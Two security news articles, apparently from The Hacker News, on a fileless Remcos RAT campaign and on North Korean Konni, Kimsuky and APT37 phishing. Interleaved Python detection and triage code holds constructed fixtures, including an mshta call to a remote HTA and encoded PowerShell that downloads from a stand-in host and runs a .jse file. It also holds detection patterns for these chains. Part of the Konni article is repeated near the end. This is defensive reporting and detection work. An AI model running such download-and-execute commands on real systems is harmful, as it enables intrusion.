• Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

    May 16, 2025Ravie LakshmananMalware / Cyber Attack

    Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT.
    "Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage."
    The latest wave of attacks, as detailed by Qualys, employs tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcut (LNK) file, which, in turn, makes use of mshta.exe, a legitimate Microsoft tool used to run HTML Applications (HTA).
    The binary is used to execute an obfuscated HTA file named "xlab22.hta" hosted on a remote server, which incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta." The HTA file is also configured to make Windows Registry modifications to ensure that "311.hta" is automatically launched upon system startup.
    Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader that ultimately proceeds to launch the Remcos RAT payload entirely in memory.
    Remcos RAT is a well-known malware that offers threat actors full control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled using Visual Studio C++ 8, it features a modular structure and can gather system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes.

    In addition, it establishes a TLS connection to a command-and-control (C2) server at "readysteaurants[.]com," maintaining a persistent channel for data exfiltration and control.
    This is not the first time fileless versions of Remcos RAT have been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that filelessly deployed the malware by making use of order-themed lures.
    What makes the attack method attractive to threat actors is that it allows them to operate undetected by many traditional security solutions as the malicious code runs directly in the computer's memory, leaving very few traces on the disk.
    "The rise of PowerShell-based attacks like the new Remcos RAT variant demonstrates how threat actors are evolving to evade traditional security measures," J Stephen Kowski, Field CTO at SlashNext, said.
    "This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses. Advanced email security that can detect and block malicious LNK attachments before they reach users is crucial, as is real-time scanning of PowerShell commands for suspicious behaviors."
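To give the real-time scanning of PowerShell and mshta activity that Kowski calls for a concrete shape, here is an added example (my own, not Qualys' or SlashNext's detection content): four rules, one per stage of the chain described above, run over constructed Sysmon-style process-creation and registry events. The HTA host name, user SID and file paths in the sample are placeholders, not indicators from the report.

```python
"""
Detection rules for the LNK -> mshta.exe -> remote HTA -> PowerShell chain,
evaluated over constructed Sysmon-style events (added example, not the
report's own content).
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Event:
    kind: str               # "process_create" or "registry_set"
    image: str              # path of the process that acted
    parent_image: str = ""  # parent process (process_create only)
    cmdline: str = ""       # command line (process_create only)
    target: str = ""        # registry value written (registry_set only)


REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
ENCODED = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s", re.IGNORECASE)
HIDDEN = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
POWERSHELL = ("powershell.exe", "pwsh.exe")


def exe(path: str) -> str:
    """Lower-cased file name of a process path (handles / and \\)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_remote_hta(ev: Event) -> bool:
    # mshta.exe fetching its HTA over HTTP(S): the "xlab22.hta hosted on a
    # remote server" stage. A locally installed HTA does not fire this rule.
    return (ev.kind == "process_create" and exe(ev.image) == "mshta.exe"
            and bool(REMOTE_URL.search(ev.cmdline)))


def powershell_from_mshta(ev: Event) -> bool:
    # The HTA's VBScript hands off to PowerShell for the shellcode loader.
    return (ev.kind == "process_create" and exe(ev.image) in POWERSHELL
            and exe(ev.parent_image) == "mshta.exe")


def powershell_hidden_encoded(ev: Event) -> bool:
    # Hidden window plus -EncodedCommand, whatever the parent process is.
    return (ev.kind == "process_create" and exe(ev.image) in POWERSHELL
            and bool(ENCODED.search(ev.cmdline))
            and bool(HIDDEN.search(ev.cmdline)))


def mshta_run_key_persistence(ev: Event) -> bool:
    # A Run-key write performed by mshta.exe: the startup entry for 311.hta.
    return (ev.kind == "registry_set" and exe(ev.image) == "mshta.exe"
            and bool(RUN_KEY.search(ev.target)))


RULES: Dict[str, Callable[[Event], bool]] = {
    "mshta_remote_hta": mshta_remote_hta,
    "powershell_from_mshta": powershell_from_mshta,
    "powershell_hidden_encoded": powershell_hidden_encoded,
    "mshta_run_key_persistence": mshta_run_key_persistence,
}


def run_rules(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule name, event index) for every rule that fires."""
    hits: List[Tuple[str, int]] = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, i))
    return hits


def sample_events() -> List[Event]:
    """Constructed events mirroring the reported chain, plus two benign ones.
    Host name, SID and paths are placeholders, not indicators from the report."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        Event("process_create", r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\explorer.exe",
              r'mshta.exe "http://remote-hta-host.example/xlab22.hta"'),
        Event("registry_set", r"C:\Windows\System32\mshta.exe",
              target=r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows"
                     r"\CurrentVersion\Run\311"),
        Event("process_create", ps, r"C:\Windows\System32\mshta.exe",
              "powershell.exe -w hidden -nop -enc QQBBAA=="),  # inert token
        # Benign: an administrator running a local script from a console.
        Event("process_create", ps, r"C:\Windows\System32\cmd.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),
        # Benign: a locally installed HTA opened from a shortcut.
        Event("process_create", r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Program Files\Vendor\console.hta"'),
    ]


if __name__ == "__main__":
    for name, idx in run_rules(sample_events()):
        print(f"{name}: event {idx}")
```

The two benign events fire nothing, which is the point of keying on the remote URL and the mshta parent rather than on mshta.exe or PowerShell alone.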

    The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader that's used to detonate a wide range of commodity information stealers and RATs like Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm.
    The loader features three stages that work in tandem to deploy the final-stage payload: a .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the main malware.
    "While earlier versions embedded the second stage as a hardcoded string, more recent versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage."
    Unit 42 described the use of bitmap resources to conceal malicious payloads as a steganography technique that can bypass traditional security mechanisms and evade detection.
    The findings also coincide with the emergence of several phishing and social engineering campaigns that are engineered for credential theft and malware delivery:

    Use of trojanized versions of the KeePass password management software – codenamed KeeLoader – to drop a Cobalt Strike beacon and steal sensitive KeePass database data, including administrative credentials. The malicious installers are hosted on KeePass typosquat domains that are served via Bing ads.
    Use of ClickFix lures and URLs embedded within PDF documents and a series of intermediary dropper URLs to deploy Lumma Stealer.
    Use of booby-trapped Microsoft Office documents that are used to deploy the Formbook information stealer protected using a malware distribution service referred to as Horus Protector.
    Use of blob URIs to locally load a credential phishing page via phishing emails, with the blob URIs served using allow-listed pages (e.g., onedrive.live[.]com) that are abused to redirect victims to a malicious site that contains a link to a threat actor-controlled HTML page.
    Use of RAR archives masquerading as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
    Use of phishing emails to distribute HTML attachments that contain malicious code to capture victims' Outlook, Hotmail, and Gmail credentials and exfiltrate them to a Telegram bot named "Blessed logs" that has been active since February 2025.

    The developments have also been complemented by the rise in artificial intelligence (AI)-powered campaigns that leverage polymorphic tricks that mutate in real time to sidestep detection efforts. These include modifying email subject lines, sender names, and body content to slip past signature-based detection.
    "AI gave threat actors the power to automate malware development, scale attacks across industries, and personalize phishing messages with surgical precision," Cofense said.
    "These evolving threats are increasingly able to bypass traditional email filters, highlighting the failure of perimeter-only defenses and the need for post-delivery detection. It also enabled them to outmaneuver traditional defenses through polymorphic phishing campaigns that shift content on the fly. The result: deceptive messages that are increasingly difficult to detect and even harder to stop."

    Source: THEHACKERNEWS.COM
  • North Korean Konni APT Targets Ukraine with Malware to track Russian Invasion Progress

    May 13, 2025Ravie LakshmananCyber Espionage / Malware

    The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating that the threat actor's targeting extends beyond Russia.
    Enterprise security firm Proofpoint said the end goal of the campaign is to collect intelligence on the "trajectory of the Russian invasion."
    "The group's interest in Ukraine follows historical targeting of government entities in Russia for strategic intelligence gathering purposes," security researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly said in a report shared with The Hacker News.
    Konni APT, also known as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group that has a history of targeting entities in South Korea, the United States, and Russia.
    It has been operational since at least 2014.
    Attack chains mounted by the threat actor often involve the use of phishing emails to distribute malware called Konni RAT (aka UpDog) and redirect recipients to credential harvesting pages.
    Proofpoint, in an analysis of the threat group published in November 2021, assessed TA406 to be one of several actors that make up the activity publicly tracked as Kimsuky, Thallium, and Konni Group.
    The latest set of attacks documented by the cybersecurity company entails the use of phishing emails that impersonate a fictitious senior fellow at a think tank called the Royal Institute of Strategic Studies, which is also a non-existent organization.
    The email messages contain a link to a password-protected RAR archive that's hosted on the MEGA cloud service.
    Opening the RAR archive using a password mentioned in the message body launches an infection sequence that's engineered to conduct extensive reconnaissance of the compromised machines.

    Specifically, present within the RAR archive is a CHM file that displays decoy content related to former Ukrainian military leader Valeriy Zaluzhnyi.
    Should the victim click anywhere on the page, a PowerShell command embedded within the HTML is executed to reach out to an external server and download a next-stage PowerShell payload.
    The newly launched PowerShell script is capable of executing various commands to gather information about the system, encode it using Base64-encoding, and send it to the same server.
    "The actor sent multiple phishing emails on consecutive days when the target did not click the link, asking the target if they had received the prior emails and if they would download the files," the researchers said.
    Proofpoint said it also observed an HTML file being directly distributed as an attachment to the phishing messages.
    In this variation of the attack, the victim is instructed to click on an embedded link in the HTML file, resulting in the download of a ZIP archive that includes a benign PDF and a Windows shortcut (LNK) file.
    When the LNK is run, it executes Base64-encoded PowerShell to drop a JavaScript Encoded (JSE) file called "Themes.jse" using a Visual Basic Script.
    The JSE malware, in turn, contacts an attacker-controlled URL and runs the response from the server via PowerShell.
    The exact nature of the payload is currently not known.
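As an added example (my own, not Proofpoint's tooling and not the actor's script), a triage helper for the LNK variant above: it recognises the Base64-encoded PowerShell the shortcut launches, decodes it (PowerShell expects Base64 over UTF-16LE text, so a plain Base64 decode yields mangled output) and lists the script file names, URLs and script hosts the decoded text references. The sample command line, the file name stage.vbs and the URL stage-host.example are constructed stand-ins, not values from the report.

```python
"""
Triage of -EncodedCommand PowerShell launched from an LNK (added example):
decode the Base64/UTF-16LE payload and pull out the artefacts it names.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts -EncodedCommand and its common abbreviations; the value
# is Base64 over UTF-16LE text. Longest alternative first so -e never
# swallows -enc.
ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
SCRIPT_FILE = re.compile(
    r"([\w\-]+\.(?:jse|js|vbs|vbe|wsf|hta|ps1|bat|cmd))\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>;)]+", re.IGNORECASE)
INTERP = re.compile(
    r"\b(wscript|cscript|mshta|regsvr32|rundll32|powershell)(?:\.exe)?\b",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries -EncodedCommand, else None.
    Tolerates stripped '=' padding; malformed tokens yield None, not a crash."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    token = m.group(1)
    token += "=" * (-len(token) % 4)
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_indicators(text: str) -> Dict[str, List[str]]:
    """Script file names, URLs and script hosts referenced in text."""
    return {
        "files": sorted({m.group(1) for m in SCRIPT_FILE.finditer(text)}),
        "urls": sorted(set(URL.findall(text))),
        "interpreters": sorted({m.group(1).lower()
                                for m in INTERP.finditer(text)}),
    }


def triage(cmdline: str) -> Dict[str, object]:
    """Decode if encoded, then report indicators from the decoded text
    (or from the raw command line when nothing was encoded)."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    result: Dict[str, object] = {
        "encoded": decoded is not None,
        "decoded": decoded or "",
    }
    result.update(extract_indicators(text))
    return result


def encode_for_powershell(script: str) -> str:
    """Produce the Base64(UTF-16LE) form PowerShell expects; used only to
    build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed, inert stand-in for the decoded script: it only names the
# artefacts reported above (Themes.jse, a VBScript dropper, wscript) plus a
# placeholder URL. stage.vbs and stage-host.example are invented here.
_SAMPLE_SCRIPT = (
    '$u = "http://stage-host.example/next"; '
    '$d = "$env:APPDATA\\Themes.jse"; '
    '$v = "$env:TEMP\\stage.vbs"; '
    'Start-Process wscript.exe -ArgumentList $v'
)
SAMPLE_CMDLINE = ("powershell.exe -w hidden -nop -enc "
                  + encode_for_powershell(_SAMPLE_SCRIPT))
# Benign command line with no encoded payload, for comparison.
SAMPLE_CMDLINE_PLAIN = r"powershell.exe -File C:\scripts\inventory.ps1"


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, SAMPLE_CMDLINE_PLAIN):
        print(triage(line))
```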
    Furthermore, TA406 has been spotted attempting to harvest credentials by sending fake Microsoft security alert messages to Ukrainian government entities from ProtonMail accounts, warning them of suspicious sign-in activity from IP addresses located in the United States and urging them to verify the login by visiting a link.
    While the credential harvesting page has not been recovered, the same compromised domain is said to have been used in the past to collect Naver login information.
    "These credential harvesting campaigns took place prior to the attempted malware deployments and targeted some of the same users later targeted with the HTML delivery campaign," Proofpoint said.
    "TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments."
    "Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts."

    The disclosure comes as the Konni group has been linked to a sophisticated multi-stage malware campaign targeting entities in South Korea with ZIP archives containing LNK files, which run PowerShell scripts to extract a CAB archive and ultimately deliver batch script malware capable of collecting sensitive data and exfiltrating it to a remote server.
    The findings also dovetail with spear-phishing campaigns orchestrated by Kimsuky to target government agencies in South Korea by delivering a stealer malware capable of establishing command-and-control (C2 or C&C) communications and exfiltrating files, web browser data, and cryptocurrency wallet information.

    According to South Korean cybersecurity company AhnLab, Kimsuky has also been observed propagating PEBBLEDASH as part of a multi-stage infection sequence initiated via spear-phishing.
    The trojan was attributed by the U.S. government to the Lazarus Group in May 2020.
    "While the Kimsuky group uses various types of malware, in the case of PEBBLEDASH, they execute malware based on an LNK file by spear-phishing in the initial access stage to launch their attacks," it said.

    "They then utilize a PowerShell script to create a task scheduler and register it for automatic execution. Through communication with a Dropbox and TCP socket-based C&C server, the group installs multiple malware and tools including PEBBLEDASH."
    Konni and Kimsuky are far from the only North Korean threat actors to focus on Seoul.
    As recently as March 2025, South Korean entities have been found to be at the receiving end of another campaign carried out by APT37, which is also referred to as ScarCruft.
    Dubbed Operation ToyBox Story, the spear-phishing attacks singled out several activists focused on North Korea, per the Genians Security Center (GSC).
    The first observed spear phishing attack occurred on March 8, 2025.
    "The email contained a Dropbox link leading to a compressed archive that included a malicious shortcut (LNK) file," the South Korean company said.
    "When extracted and executed, the LNK file activated additional malware containing the keyword 'toy.'"

    The LNK files are configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named toy03.bat, toy02.bat, and toy01.bat (in that order), the last of which contains shellcode to launch RokRAT, a staple malware associated with APT37.
    RokRAT is equipped to collect system information, capture screenshots, and use three different cloud services, including pCloud, Yandex, and Dropbox for C2.
    "The threat actors exploited legitimate cloud services as C2 infrastructure and continued to modify shortcut (LNK) files while focusing on fileless attack techniques to evade detection by antivirus software installed on target endpoints," Genians said.

    Source: https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html
Should the victim click anywhere on the page, a PowerShell command embedded within the HTML is executed to reach out to an external server and download a next-stage PowerShell payload. The newly launched PowerShell script is capable of executing various commands to gather information about the system, encode it using Base64-encoding, and send it to the same server. "The actor sent multiple phishing emails on consecutive days when the target did not click the link, asking the target if they had received the prior emails and if they would download the files," the researchers said. Proofpoint said it also observed an HTML file being directly distributed as an attachment to the phishing messages. In this variation of the attack, the victim is instructed to click on an embedded link in the HTML file, resulting in the download of a ZIP archive that includes a benign PDF and a Windows shortcut (LNK) file. When the LNK is run, it executes Base64-encoded PowerShell to drop a Javascript Encoded file called "Themes.jse" using a Visual Basic Script. The JSE malware, in turn, contacts an attacker-controlled URL and runs the response from the server via PowerShell. The exact nature of the payload is currently not known. Furthermore, TA406 has been spotted attempting to harvest credentials by sending fake Microsoft security alert messages to Ukrainian government entities from ProtonMail accounts, warning them of suspicious sign-in activity from IP addresses located in the United States and urging them to verify the login by visiting a link. While the credential harvesting page has not been recovered, the same compromised domain is said to have been used in the past to collect Naver login information. "These credential harvesting campaigns took place prior to the attempted malware deployments and targeted some of the same users later targeted with the HTML delivery campaign," Proofpoint said. 
"TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments." "Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts." The disclosure comes as the Konni group has been linked to a sophisticated multi-stage malware campaign targeting entities in South Korea with ZIP archives containing LNK files, which run PowerShell scripts to extract a CAB archive and ultimately deliver batch script malware capable of collecting sensitive data and exfiltrating it to a remote server. The findings also dovetail with spear-phishing campaigns orchestrated by Kimsuky to target government agencies in South Korea by delivering a stealer malware capable of establishing command-and-control (C2 or C&C) communications and exfiltrating files, web browser data, and cryptocurrency wallet information. According to South Korean cybersecurity company AhnLab, Kimsuky has also been observed propagating PEBBLEDASH as part of a multi-stage infection sequence initiated via spear-phishing. The trojan was attributed by the U.S. government to the Lazarus Group in May 2020. "While the Kimsuky group uses various types of malware, in the case of PEBBLEDASH, they execute malware based on an LNK file by spear-phishing in the initial access stage to launch their attacks," it said. "They then utilize a PowerShell script to create a task scheduler and register it for automatic execution. Through communication with a Dropbox and TCP socket-based C&C server, the group installs multiple malware and tools including PEBBLEDASH." Konni and Kimsuky are far from the only North Korean threat actors to focus on Seoul. 
As recently as March 2025, South Korean entities have been found to be at the receiving end of another campaign carried out by APT37, which is also referred to as ScarCruft. Dubbed Operation ToyBox Story, the spear-phishing attacks singled out several activists focused on North Korea, per the Genians Security Center (GSC). The first observed spear phishing attack occurred on March 8, 2025. "The email contained a Dropbox link leading to a compressed archive that included a malicious shortcut (LNK) file," the South Korean company said. "When extracted and executed, the LNK file activated additional malware containing the keyword 'toy.'" The LNK files are configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named toy03.bat, toy02.bat, and toy01.bat (in that order), the last of which contains shellcode to launch RoKRAT, a staple malware associated with APT37. RokRAT is equipped to collect system information, capture screenshots, and use three different cloud services, including pCloud, Yandex, and Dropbox for C2. "The threat actors exploited legitimate cloud services as C2 infrastructure and continued to modify shortcut (LNK) files while focusing on fileless attack techniques to evade detection by antivirus software installed on target endpoints," Genians said. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    
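Added example, not code from the article or from Proofpoint, AhnLab or Genians: a small Python triage routine that decodes the PowerShell `-EncodedCommand` argument from constructed process-creation events and flags the markers shared by the chains described above (a shortcut launched from Explorer, a dropped .jse handed to a script host, PowerShell-created scheduled tasks, download-and-run, and the cloud services used for C2). The event tuple layout, indicator names and sample command lines are assumptions made for the example.

```python
import base64
import re
# Added example, not code from the article or the vendors it cites. Events are constructed
# (parent_image, image, command_line) tuples standing in for process-creation telemetry.
PS_ENC = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Markers from the chains described above: .jse dropped to a script host, PowerShell-made
# scheduled task, download-and-run, and the cloud services used for C2.
INDICATORS = {
    "drops_jse": re.compile(r"\.jse\b", re.I),
    "script_host": re.compile(r"\b[wc]script(?:\.exe)?\b", re.I),
    "scheduled_task": re.compile(r"\bschtasks\b|Register-ScheduledTask", re.I),
    "download_exec": re.compile(r"DownloadString|Invoke-WebRequest|\biex\b|Invoke-Expression", re.I),
    "cloud_c2": re.compile(r"dropbox\.com|pcloud\.com|yandex\.", re.I),
}

def encode_ps(command: str) -> str:
    """Build an -EncodedCommand value (UTF-16LE, then Base64); used only to construct samples."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_ps(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = PS_ENC.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return the sorted list of indicator names that fire for one event."""
    parent, _image, command_line = event
    decoded = decode_ps(command_line)
    if decoded is None:
        return []
    hits = {"encoded_command"}
    # A shortcut double-clicked in Explorer starts its target with explorer.exe as parent.
    if parent.lower().endswith("explorer.exe"):
        hits.add("launched_from_shell")
    hits.update(name for name, pat in INDICATORS.items() if pat.search(decoded))
    return sorted(hits)

# Constructed samples: an admin one-liner, and a chain shaped like the TA406 LNK stage.
BENIGN = ("C:\\Windows\\System32\\cmd.exe", "powershell.exe",
          "powershell.exe -enc " + encode_ps("Get-Service | Where-Object Status -eq Running"))
CHAIN = ("C:\\Windows\\explorer.exe", "powershell.exe",
         "powershell.exe -w hidden -enc " + encode_ps(
             "$p=\"$env:APPDATA\\Themes.jse\"; $b=(New-Object Net.WebClient)"
             ".DownloadString('http://stage.example.invalid/t'); Set-Content $p $b; wscript.exe $p"))
```

In production the same routine would be fed from Sysmon event 1 or 4688 records, and the `launched_from_shell` plus `drops_jse` combination is the pair worth alerting on first.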